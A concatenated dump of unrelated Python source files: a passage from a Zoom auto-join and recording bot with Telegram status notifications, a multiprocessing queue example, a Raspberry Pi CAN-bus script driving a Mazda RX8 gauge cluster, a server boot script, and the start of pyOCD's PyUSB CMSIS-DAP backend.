x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
# Move mouse from screen
pyautogui.moveTo(0, 0)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
except TypeError:
logging.error("Could not find view options!")
else:
VIDEO_PANEL_HIDED = False
time.sleep(self.interval)
def send_telegram_message(text):
global TELEGRAM_TOKEN
global TELEGRAM_CHAT_ID
global TELEGRAM_RETRIES
url_req = "https://api.telegram.org/bot" + TELEGRAM_TOKEN + "/sendMessage" + "?chat_id=" + TELEGRAM_CHAT_ID + "&text=" + text
tries = 0
done = False
while not done:
results = requests.get(url_req)
results = results.json()
done = 'ok' in results and results['ok']
tries+=1
if not done and tries < TELEGRAM_RETRIES:
print("Sending Telegram message failed, retring in 5 seconds...")
time.sleep(5)
if not done and tries >= TELEGRAM_RETRIES:
print("Sending Telegram message failed {} times, please check your credentials!".format(tries))
done = True
def check_connecting(zoom_pid, start_date, duration):
# Check if connecting
check_periods = 0
connecting = False
# Check if connecting
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is not None:
connecting = True
logging.info("Connecting..")
# Wait while connecting
# Exit when meeting ends after time
while connecting:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom_pid), signal.SIGQUIT)
return
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is None:
logging.info("Maybe not connecting anymore..")
check_periods += 1
if check_periods >= 2:
connecting = False
logging.info("Not connecting anymore..")
return
time.sleep(2)
def join_meeting(meet_id):
logging.info("Join a meeting..")
found_join_meeting = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), minSearchTime=2, confidence=0.9)
pyautogui.click(x, y)
found_join_meeting = True
except TypeError:
pass
if not found_join_meeting:
logging.error("Could not find 'Join Meeting' on screen!")
return False
time.sleep(2)
# Insert meeting id
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.write(meet_id, interval=0.1)
# Insert name
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
# Sometimes invalid id error is displayed
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'invalid_meeting_id.png'), confidence=0.9) is not None:
logging.error("Maybe a invalid meeting id was inserted..")
left = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'leave.png'), confidence=0.9)
pyautogui.click(x, y)
left = True
except TypeError:
pass
# Valid id
if left:
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), confidence=0.9) is not None:
logging.error("Invalid meeting id!")
return False
else:
return True
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'authorized_attendees_only.png'), confidence=0.9) is not None:
logging.error("This meeting is for authorized attendees only!")
return False
return True
def find_process_id_by_name(process_name):
list_of_process_objects = []
# Iterate over the all the running process
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
# Check if process name contains the given name string.
if process_name.lower() in pinfo['name'].lower():
list_of_process_objects.append(pinfo)
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return list_of_process_objects
def show_toolbars():
# Mouse move to show toolbar
width, height = pyautogui.size()
y = (height / 2)
pyautogui.moveTo(0, y, duration=0.5)
pyautogui.moveTo(width - 1, y, duration=0.5)
def join_audio(description):
audio_joined = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_with_computer_audio.png'), confidence=0.9)
logging.info("Join with computer audio..")
pyautogui.click(x, y)
audio_joined = True
return True
except TypeError:
logging.error("Could not join with computer audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_with_computer_audio_error.png")
time.sleep(1)
if not audio_joined:
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_audio.png'), confidence=0.9)
pyautogui.click(x, y)
join_audio(description)
except TypeError:
logging.error("Could not join audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_audio_error.png")
return False
def join(meet_id, meet_pw, duration, description):
global VIDEO_PANEL_HIDED
ffmpeg_debug = None
logging.info("Join meeting: " + description)
if DEBUG:
# Start recording
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
logging.info("Start recording..")
filename = os.path.join(
REC_PATH, time.strftime(TIME_FORMAT)) + "-" + description + "-JOIN.mkv"
command = "ffmpeg -nostats -loglevel quiet -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg_debug = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg_debug.pid), signal.SIGQUIT)
# Exit Zoom if running
exit_process_by_name("zoom")
# Start Zoom
zoom = subprocess.Popen("zoom", stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
# Wait while zoom process is there
list_of_process_ids = find_process_id_by_name('zoom')
while len(list_of_process_ids) <= 0:
logging.info("No Running Zoom Process found!")
list_of_process_ids = find_process_id_by_name('zoom')
time.sleep(1)
# Wait for zoom is started
while pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'join_meeting.png'), confidence=0.9) is None:
logging.info("Zoom not ready yet!")
time.sleep(1)
logging.info("Zoom started!")
start_date = datetime.now()
joined = join_meeting(meet_id)
if not joined:
send_telegram_message("Failed to join meeting {}!".format(description))
logging.error("Failed to join meeting!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG and ffmpeg_debug is not None:
# closing ffmpeg
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
pyautogui.write(meet_pw, interval=0.2)
pyautogui.press('tab')
pyautogui.press('space')
# Joined meeting
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if meeting is started by host
check_periods = 0
meeting_started = True
time.sleep(2)
# Check if waiting for host
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9, minSearchTime=3) is not None:
meeting_started = False
logging.info("Please wait for the host to start this meeting.")
# Wait for the host to start this meeting
# Exit when meeting ends after time
while not meeting_started:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9) is None:
logging.info("Maybe meeting was started now.")
check_periods += 1
if check_periods >= 2:
meeting_started = True
logging.info("Meeting started by host.")
break
time.sleep(2)
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if in waiting room
check_periods = 0
in_waitingroom = False
time.sleep(2)
# Check if joined into waiting room
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'waiting_room.png'), confidence=0.9,
minSearchTime=3) is not None:
in_waitingroom = True
logging.info("Please wait, the meeting host will let you in soon..")
# Wait while host will let you in
# Exit when meeting ends after time
while in_waitingroom:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'waiting_room.png'), confidence=0.9) is None:
logging.info("Maybe no longer in the waiting room..")
check_periods += 1
if check_periods == 2:
logging.info("No longer in the waiting room..")
break
time.sleep(2)
# Meeting joined
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
logging.info("Joined meeting..")
# Check if recording warning is shown at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'warn_meeting_recording.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'accept_recording.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if host is sharing poll results at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Start BackgroundThread
BackgroundThread()
# Set computer audio
time.sleep(2)
if not join_audio(description):
logging.info("Exit!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
time.sleep(2)
join(meet_id, meet_pw, duration, description)
time.sleep(2)
logging.info("Enter fullscreen..")
show_toolbars()
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
fullscreen = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
fullscreen = True
except TypeError:
logging.error("Could not find fullscreen!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_fullscreen_error.png")
# TODO: Check for 'Exit Full Screen': already fullscreen -> fullscreen = True
# Screensharing already active
if not fullscreen:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
# Switch to fullscreen
time.sleep(2)
show_toolbars()
logging.info("Enter fullscreen..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'enter_fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not enter fullscreen by image!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_enter_fullscreen_error.png")
return
time.sleep(2)
# Screensharing not active
screensharing_active = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
screensharing_active = True
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
time.sleep(2)
if screensharing_active:
# hide video panel
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_hide_video_panel_error.png")
else:
# switch to speaker view
show_toolbars()
logging.info("Switch view..")
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
try:
# speaker view
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'speaker_view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not switch speaker view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_speaker_view_error.png")
try:
# minimize panel
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'minimize.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not minimize panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_minimize_error.png")
# Move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
# Audio
# Start recording
logging.info("Start recording..")
filename = os.path.join(REC_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + ".mkv"
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
command = "ffmpeg -nostats -loglevel error -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg.pid), signal.SIGQUIT)
start_date = datetime.now()
end_date = start_date + timedelta(seconds=duration + 300) # Add 5 minutes
# Start thread to check active screensharing
HideViewOptionsThread()
# Send Telegram notification
send_telegram_message("Joined Meeting '{}' and started recording.".format(description))
meeting_running = True
while meeting_running:
time_remaining = end_date - datetime.now()
if time_remaining.total_seconds() < 0 or not ONGOING_MEETING:
meeting_running = False
else:
print(f"Meeting ends in {time_remaining}", end="\r", flush=True)
time.sleep(5)
logging.info("Meeting ends at %s" % datetime.now())
# Close everything
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
os.killpg(os.getpgid(ffmpeg.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
if not ONGOING_MEETING:
try:
# Press OK after meeting ended by host
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'ok.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_ok_error.png")
send_telegram_message("Meeting '{}' ended.".format(description))
def exit_process_by_name(name):
list_of_process_ids = find_process_id_by_name(name)
if len(list_of_process_ids) > 0:
logging.info(name + " process exists | killing..")
for elem in list_of_process_ids:
process_id = elem['pid']
try:
os.kill(process_id, signal.SIGKILL)
except Exception as ex:
logging.error("Could not terminate " + name +
"[" + str(process_id) + "]: " + str(ex))
def join_ongoing_meeting():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
for row in csv_reader:
# Check and join ongoing meeting
curr_date = datetime.now()
# Monday, tuesday, ..
if row["weekday"].lower() == curr_date.strftime('%A').lower():
curr_time = curr_date.time()
start_time_csv = datetime.strptime(row["time"], '%H:%M')
start_date = curr_date.replace(
hour=start_time_csv.hour, minute=start_time_csv.minute)
start_time = start_date.time()
end_date = start_date + \
timedelta(seconds=int(row["duration"]) * 60 + 300) # Add 5 minutes
end_time = end_date.time()
recent_duration = (end_date - curr_date).total_seconds()
if start_time < end_time:
if start_time <= curr_time <= end_time:
if str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
else: # crosses midnight
if curr_time >= start_time or curr_time <= end_time:
if str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
def setup_schedule():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
line_count = 0
for row in csv_reader:
if str(row["record"]) == 'true':
cmd_string = "schedule.every()." + row["weekday"] \
+ ".at(\"" \
+ (datetime.strptime(row["time"], '%H:%M') - timedelta(minutes=1)).strftime('%H:%M') \
+ "\").do(join, meet_id=\"" + row["id"] \
+ "\", meet_pw=\"" + row["password"] \
+ "\", duration=" + str(int(row["duration"]) * 60) \
+ ", description=\"" + row["description"] + "\")"
cmd = compile(cmd_string, "<string>", "eval")
eval(cmd)
line_count += 1
logging.info("Added %s meetings to schedule." % line_count)
def main():
try:
if DEBUG and not os.path.exists(DEBUG_PATH):
os.makedirs(DEBUG_PATH)
except Exception:
logging.error("Failed to create screenshot folder!")
raise
setup_schedule()
join_ongoing_meeting()
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
time_of_next_run = schedule.next_run()
time_now = datetime.now()
remaining = time_of_next_run - time_now
print(f"Next meeting in {remaining}", end="\r", flush=True)
|
multiprocessing4__.py
|
# multiprocessing4.py
# -*- coding: utf-8 -*-
from multiprocessing import Process, Queue
import os, time, random
# 数据进程执行代码:
def write(q):
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行代码:
def read(q):
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target = write, args = (q,))
pr = Process(target = read, args = (q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
SPEED(run_with_python3).py
|
#!/usr/bin/python3
#
#
# This python3 program sends out CAN data from the PiCAN2 board to a Mazda RX8 instrument cluster.
# For use with PiCAN boards on the Raspberry Pi
# http://skpang.co.uk/catalog/pican2-canbus-board-for-raspberry-pi-2-p-1475.html
#
# Make sure Python-CAN is installed first http://skpang.co.uk/blog/archives/1220
#
#
#
import can
import time
import os
import subprocess
from threading import Thread
import multiprocessing
import re
RPM_PID = 0x201
#oil temp 0x420
print('Bring up CAN0....')
os.system("sudo /sbin/ip link set can0 up type can bitrate 500000")
time.sleep(0.1)
print('Ready')
try:
bus = can.interface.Bus(channel='can0', bustype='socketcan_native')
except OSError:
print('Cannot find PiCAN board.')
GPIO.output(led,False)
exit()
seconds = .1
run = True
speed_in = 40
rpm_in = 0
data = [rpm_in,0x00,0,0,speed_in,0,0,0]
# def rpm_go():
# while run:
# # for rpm in range(50,130):
# # GPIO.output(led,True)
# msg = can.Message(arbitration_id=RPM_PID,data=[0,0x00,0,0,speed_in,0,0,0],extended_id=False)
# bus.send(msg)
# # print(' {0:d}'.format(rpm))
# time.sleep(seconds)
# # GPIO.output(led,False)
# # time.sleep(0.04)
def speed_test(list_in):
'''gets the internet speed'''
while True:
response = subprocess.Popen('/usr/local/bin/speedtest-cli --simple', shell=True, stdout=subprocess.PIPE).stdout.read().decode('utf-8')
ping = re.findall('Ping:\s(.*?)\s', response, re.MULTILINE)
download = re.findall('Download:\s(.*?)\s', response, re.MULTILINE)
upload = re.findall('Upload:\s(.*?)\s', response, re.MULTILINE)
ping = ping[0].replace(',', '.')
download = download[0].replace(',', '.')
upload = upload[0].replace(',', '.')
print(download,upload)
list_in['ping'] = ping
list_in['download'] = download
list_in['upload'] = upload
time.sleep(300)
def tac():
while run:
for rpm in range(0,150):
# GPIO.output(led,True)
data[0] = rpm
# print(' {0:d}'.format(rpm))
time.sleep(0.4)
# time.sleep(0.04)
def send_msg():
# run speed test
manager = multiprocessing.Manager()
list_val = manager.dict({'download': 0.0,'upload':0.0,'ping':0.0})
p1 = multiprocessing.Process(target=speed_test,args=[list_val])
p1.start()
while run:
download = list_val['download']
upload = list_val['upload']
temp = float(download)/1.6 + 39
data[4] = int(round(temp))
temp = float(upload)/10 * 15
data[0] = int(round(temp))
# data_in = [rpm_in,0x00,0,0,speed_in,0,0,0]
msg = can.Message(arbitration_id=RPM_PID,data=data,extended_id=False)
bus.send(msg)
time.sleep(0.1)
# Main loop
try:
t1 = Thread(target=send_msg)
t1.start()
t2 = Thread(target=tac)
# t2.start()
while run:
Myinput = input("(r)pm/(s)peed/delay: ")
if Myinput == "exit":
run = False
elif Myinput[0] == 'r':
speed_in = int(Myinput[1:])
elif Myinput[0] == 's':
temp = float(Myinput[1:])/1.6 + 39
speed_in = int(round(temp))
else:
seconds = float(Myinput)
print('second is', seconds)
data[4] = speed_in
t1.join()
# t2.join()
except KeyboardInterrupt:
#Catch keyboard interrupt
GPIO.output(led,False)
run = False
os.system("sudo /sbin/ip link set can0 down")
print('\n\rKeyboard interrtupt')
|
boot.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import sys
import threading
from api import Servant, Scheduler, Proxy
from cmdexecutor import exec_linux_cmd
from extloader import load_exts, set_ext_dict_to_topology
from operations import get_operation_dict
from server import create_server_instance
from topology import Topology
def create_api_service(opts={}):
# loads extensions
ext_dict = load_exts()
# creates topology
topology = Topology()
# creates api service
servant = Servant(topology)
scheduler = Scheduler()
proxy = Proxy(scheduler, servant)
# configures api service
scheduler.daemon = True
servant.set_operation_dict(get_operation_dict())
# configures topology
set_ext_dict_to_topology(ext_dict, topology)
if 'is_exec_nothing' not in opts or not opts['is_exec_nothing']:
topology.set_cmdexecutor(exec_linux_cmd)
return proxy
def boot(argvs=[]):
logging.basicConfig(level=logging.DEBUG)
api_service = create_api_service()
server_instance = create_server_instance(port=8888, api=api_service)
def server_instance_task():
try:
logging.info('Starting server instance.')
server_instance.start()
finally:
logging.info('server instance stopped.')
def start_thread_as_daemon(target, name):
th = threading.Thread(target=target, name=name)
th.daemon = True
th.start()
return th
api_service.start()
th_server_instance = start_thread_as_daemon(
target=server_instance_task,
name='server_instance_thread')
server_instance_join_timeout = 10.0
while th_server_instance.is_alive():
try:
th_server_instance.join(server_instance_join_timeout)
except KeyboardInterrupt, SystemExit:
logging.info('Interrupted')
server_instance.stop()
api_service.stop()
logging.info('main thread terminated.')
if __name__ == '__main__':
argvs = sys.argv
boot(argvs)
# EOF
|
pyusb_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import six
from time import sleep
import platform
import errno
from .interface import Interface
from .common import (
USB_CLASS_HID,
filter_device_by_class,
is_known_cmsis_dap_vid_pid,
check_ep,
)
from ..dap_access_api import DAPAccessIntf
from ... import common
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
if platform.system() == "Linux":
LOG.error("PyUSB is required for CMSIS-DAP support on Linux")
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSB(Interface):
"""! @brief CMSIS-DAP USB interface class using pyusb for the backend.
"""
isAvailable = IS_AVAILABLE
did_show_no_libusb_warning = False
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 64
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" % self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get count of HID interfaces and create the matcher object
hid_interface_count = len(list(usb.util.find_descriptor(config, find_all=True, bInterfaceClass=USB_CLASS_HID)))
matcher = MatchCmsisDapv1Interface(hid_interface_count)
# Get CMSIS-DAPv1 interface
interface = usb.util.find_descriptor(config, custom_match=matcher)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv1 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & usb.util.ENDPOINT_IN:
ep_in = endpoint
else:
ep_out = endpoint
# Detach kernel driver
self.kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
LOG.debug("Detaching Kernel Driver of Interface %d from USB device (VID=%04x PID=%04x).", interface_number, dev.idVendor, dev.idProduct)
dev.detach_kernel_driver(interface_number)
self.kernel_driver_was_attached = True
except (NotImplementedError, usb.core.USBError) as e:
# Some implementations don't don't have kernel attach/detach
LOG.warning("USB Kernel Driver Detach Failed ([%s] %s). Attached driver may interfere with pyOCD operations.", e.errno, e.strerror)
pass
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected CMSIS-DAP devices.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
except usb.core.NoBackendError:
if not PyUSB.did_show_no_libusb_warning:
LOG.warning("CMSIS-DAPv1 probes may not be detected because no libusb library was found.")
PyUSB.did_show_no_libusb_warning = True
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint associated to the HID interface
"""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
self.ep_out.write(data)
def read(self):
"""! @brief Read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def close(self):
"""! @brief Close the interface
"""
assert self.closed is False
LOG.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
LOG.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class MatchCmsisDapv1Interface(object):
"""! @brief Match class for finding CMSIS-DAPv1 interface.
This match class performs several tests on the provided USB interface descriptor, to
determine whether it is a CMSIS-DAPv1 interface. These requirements must be met by the
interface:
1. If there is more than one HID interface on the device, the interface must have an interface
name string containing "CMSIS-DAP".
2. bInterfaceClass must be 0x03 (HID).
3. bInterfaceSubClass must be 0.
4. Must have interrupt in endpoint, with an optional interrupt out endpoint, in that order.
"""
def __init__(self, hid_interface_count):
"""! @brief Constructor."""
